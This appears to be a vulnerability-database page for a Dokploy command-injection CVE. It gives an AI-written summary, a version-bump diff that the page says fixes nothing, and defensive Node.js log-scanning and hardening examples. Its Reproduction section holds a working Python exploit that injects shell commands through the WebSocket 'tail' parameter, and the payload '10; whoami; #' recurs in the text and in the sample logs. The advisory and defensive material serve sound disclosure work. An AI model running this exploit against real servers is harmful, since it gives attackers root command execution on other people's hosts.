CVE-2026-45633
Description
Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.6 and earlier, Dokploy contains a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since parameters are not validated and are directly concatenated into shell commands, allowing authenticated users to execute arbitrary commands with root privileges.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Dokploy v0.26.6 and earlier have a command injection in the /docker-container-logs WebSocket endpoint allowing authenticated root-level RCE.
Vulnerability
Dokploy versions 0.26.6 and earlier contain a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since URL parameters are not validated and are directly concatenated into a shell command executed via spawn(shell, ["-c", command]), allowing an authenticated attacker to inject arbitrary shell commands. [1]
Exploitation
An attacker with network access to the Dokploy instance and valid authentication can send a crafted WebSocket request to /docker-container-logs with a malicious tail or since parameter containing shell metacharacters (e.g., 10; whoami; #). The server then executes the injected command without further user interaction. [1]
Impact
Successful exploitation grants arbitrary command execution with root privileges, leading to full compromise of the Dokploy application and potentially the host system, including data exfiltration, backdoor installation, and lateral movement. [1]
Mitigation
As of the publication date, no patched version has been released. Users should restrict access to the WebSocket endpoint to trusted authenticated users and consider implementing input validation manually. Monitor the Dokploy project for security updates. [1]
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
Patches (2)
fa201a5a963e Update package.json
1 file changed · +1 −1
apps/dokploy/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "dokploy", - "version": "v0.26.6", + "version": "v0.26.7", "private": true, "license": "Apache-2.0", "type": "module",
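Review bot: this hunk changes only `"version": "v0.26.6"` to `"version": "v0.26.7"` in apps/dokploy/package.json; no line of `apps/dokploy/server/wss/docker-container-logs.ts` is touched, so the unvalidated `tail`/`since` concatenation into `spawn(shell, ["-c", command])` described on this page is not addressed by what the diff shows. The version bump should not be read as remediation; a fix would need to validate both parameters and pass them to `spawn("docker", args)` as an argument array, and a changeset that only edits package.json should carry a note saying whether a code fix follows separately.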
Vulnerability mechanics
Root cause
"Missing input validation on the `tail` and `since` WebSocket parameters allows direct shell command injection."
Attack vector
An authenticated attacker sends a WebSocket request to `/docker-container-logs` with a malicious `tail` or `since` parameter containing shell metacharacters (e.g., `10; whoami; #`). The server concatenates this payload directly into a `docker container logs` command, which the shell interprets as multiple commands. The injected command executes with root privileges because the Dokploy service runs as root. [CWE-78, ref_id=1]
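As an added defender-side example (not code from Dokploy or the advisory; the project file is TypeScript, this is plain Node.js), the following script scans reverse-proxy access-log lines for WebSocket upgrade requests to `/docker-container-logs` whose `tail` or `since` value falls outside what a legitimate `docker container logs` call would carry. The log lines, client addresses and allowlist regexes are constructed assumptions for the example.

```javascript
// Added example (not from Dokploy or the advisory): flag WebSocket upgrade
// requests to /docker-container-logs whose `tail` or `since` values fall
// outside what `docker container logs` legitimately accepts.

// Constructed, nginx-style access-log lines for a reverse proxy in front of Dokploy.
const SAMPLE_ACCESS_LOG = [
  '10.0.0.5 - - [29/May/2026:10:00:01 +0000] "GET /docker-container-logs?containerId=web1&tail=100&since=10m HTTP/1.1" 101 0',
  '10.0.0.9 - - [29/May/2026:10:00:07 +0000] "GET /docker-container-logs?containerId=dummy&tail=10%3B%20whoami%3B%20%23 HTTP/1.1" 101 0',
  '10.0.0.5 - - [29/May/2026:10:00:12 +0000] "GET /dashboard HTTP/1.1" 200 5120',
  '10.0.0.9 - - [29/May/2026:10:00:20 +0000] "GET /docker-container-logs?containerId=web1&tail=all&since=2026-05-29T09%3A00%3A00Z HTTP/1.1" 101 0',
];

// Allowlists for the two parameters (this example's assumption about what is legitimate):
// --tail takes "all" or a line count; --since takes a duration or an RFC 3339 timestamp.
const TAIL_OK = /^(?:all|\d{1,9})$/;
const SINCE_OK = /^(?:\d{1,9}[smh]|\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2}))$/;

// Pull the request target out of a combined-format log line.
function extractRequestPath(line) {
  const m = line.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Return one finding per offending parameter on a single line, or an empty array.
function inspectLogLine(line) {
  const path = extractRequestPath(line);
  if (!path) return [];
  // The base URL is only there so a relative request target parses; it is never contacted.
  const url = new URL(path, "http://dokploy.invalid");
  if (url.pathname !== "/docker-container-logs") return [];
  const findings = [];
  for (const [param, rule] of [["tail", TAIL_OK], ["since", SINCE_OK]]) {
    const value = url.searchParams.get(param); // already percent-decoded
    if (value !== null && !rule.test(value)) {
      const client = line.split(" ")[0];
      findings.push({ client, param, value });
    }
  }
  return findings;
}

// Scan a whole log (array of lines) and collect every finding.
function scanAccessLog(lines) {
  return lines.flatMap(inspectLogLine);
}

// Over the constructed lines this reports exactly one finding: the `tail` payload from 10.0.0.9.
for (const f of scanAccessLog(SAMPLE_ACCESS_LOG)) {
  console.log(`suspicious ${f.param} from ${f.client}: ${JSON.stringify(f.value)}`);
}
```

The allowlist approach is deliberate: matching on specific metacharacters (`;`, `|`, `$(`) misses encodings and alternative separators, whereas anything that is not a line count, duration or timestamp is anomalous for this endpoint regardless of how it is written. Because Dokploy runs the command as root, a single hit from an authenticated session is worth treating as an incident, not noise.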
Affected code
The vulnerability resides in `apps/dokploy/server/wss/docker-container-logs.ts`. The `tail` and `since` parameters from the WebSocket URL are not validated (lines 32-36) and are directly concatenated into a shell command (lines 114-122), which is then executed via `spawn(shell, ["-c", command], ...)` (line 123). [ref_id=1]
What the fix does
The patch in commit `fa201a5a963e6594c747ba867d61637929c2f925` only bumps the version from v0.26.6 to v0.26.7 in `package.json` and does not include any code changes to fix the vulnerability. The advisory [ref_id=1] recommends adding input validation functions (`isValidTail`, `isValidSince`) and switching from shell string concatenation to using `spawn("docker", args, ...)` with a parameter array, which prevents shell injection entirely.
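The following is an added example, not Dokploy's code and not the advisory's proposed patch: it places the shell-string construction the advisory describes beside a hardened version that validates `tail` and `since` with allowlists and then passes `docker` an argument array, so no shell ever parses the values. The validator names follow the advisory's suggested `isValidTail`/`isValidSince`; their bodies, the `isValidContainerId` helper and `buildDockerLogsArgs` are this example's assumptions. Written in plain Node.js rather than the project's TypeScript.

```javascript
// Added example (not Dokploy's code): the shell-string pattern the advisory
// describes, beside a hardened version that validates `tail`/`since` and hands
// docker an argument array.

// Validators named after the advisory's suggested isValidTail/isValidSince;
// their bodies are this example's assumption about what docker accepts.
function isValidTail(tail) {
  // `docker container logs --tail` takes "all" or a non-negative line count
  return typeof tail === "string" && /^(?:all|\d{1,9})$/.test(tail);
}

function isValidSince(since) {
  // `--since` takes a relative duration (e.g. 10m, 2h) or an RFC 3339 timestamp
  return typeof since === "string" &&
    /^(?:\d{1,9}[smh]|\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2}))$/.test(since);
}

function isValidContainerId(id) {
  // docker container names and IDs: alphanumerics plus _ . - (assumed allowlist)
  return typeof id === "string" && /^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$/.test(id);
}

// Vulnerable shape (for contrast): the values are interpolated into one string that
// is later run as `sh -c "<string>"`, so a value like "10; whoami; #" becomes three commands.
function buildVulnerableCommand(containerId, tail, since) {
  return `docker container logs --tail ${tail} --since ${since} ${containerId}`;
}

// Hardened: reject anything outside the allowlists, then return an argv array.
function buildDockerLogsArgs(containerId, tail, since) {
  if (!isValidContainerId(containerId)) throw new Error("invalid containerId");
  if (!isValidTail(tail)) throw new Error("invalid tail");
  if (!isValidSince(since)) throw new Error("invalid since");
  return ["container", "logs", "--tail", tail, "--since", since, containerId];
}

// Stream logs without a shell: spawn("docker", args) passes each element as one
// argument, so metacharacters can only ever be a (rejected) literal value, never syntax.
function streamContainerLogs(containerId, tail, since, onChunk) {
  const { spawn } = require("node:child_process");
  const args = buildDockerLogsArgs(containerId, tail, since); // throws before anything runs
  const child = spawn("docker", args, { stdio: ["ignore", "pipe", "pipe"] });
  child.stdout.on("data", (chunk) => onChunk(chunk.toString()));
  child.stderr.on("data", (chunk) => onChunk(chunk.toString()));
  return child;
}
```

Both layers matter: the argument array alone already removes the shell, so `10; whoami; #` would merely make `docker` reject an unparseable `--tail`; the validators on top of it return a clean error to the WebSocket client before any process is started and keep `docker`'s own option parser from seeing attacker-chosen strings at all.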
Preconditions
- auth: Attacker must have a valid authenticated session cookie for Dokploy
- network: Attacker must be able to reach the WebSocket endpoint over the network
- input: The `tail` or `since` query parameter must be attacker-controlled and contain shell metacharacters
Reproduction
```python
#!/usr/bin/env python3
import asyncio
from urllib.parse import quote

import websockets


async def exploit(target, cookie, cmd):
    # Shell metacharacters in `tail` terminate the docker logs command and append `cmd`
    payload = f"10; {cmd}; #"
    uri = f"{target.replace('http', 'ws')}/docker-container-logs?containerId=dummy&tail={quote(payload)}"
    # Authenticate with the session cookie on the WebSocket upgrade request
    async with websockets.connect(uri, additional_headers={"Cookie": cookie}) as ws:
        output = ""
        # Collect streamed output until the server goes quiet for 2 seconds
        while True:
            try:
                output += await asyncio.wait_for(ws.recv(), timeout=2)
            except asyncio.TimeoutError:
                break
        return output


# Usage: python3 poc.py http://target:3001 "better-auth.session_token=xxx" whoami
```
[ref_id=1]
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (1)
News mentions (0)
No linked articles in our index yet.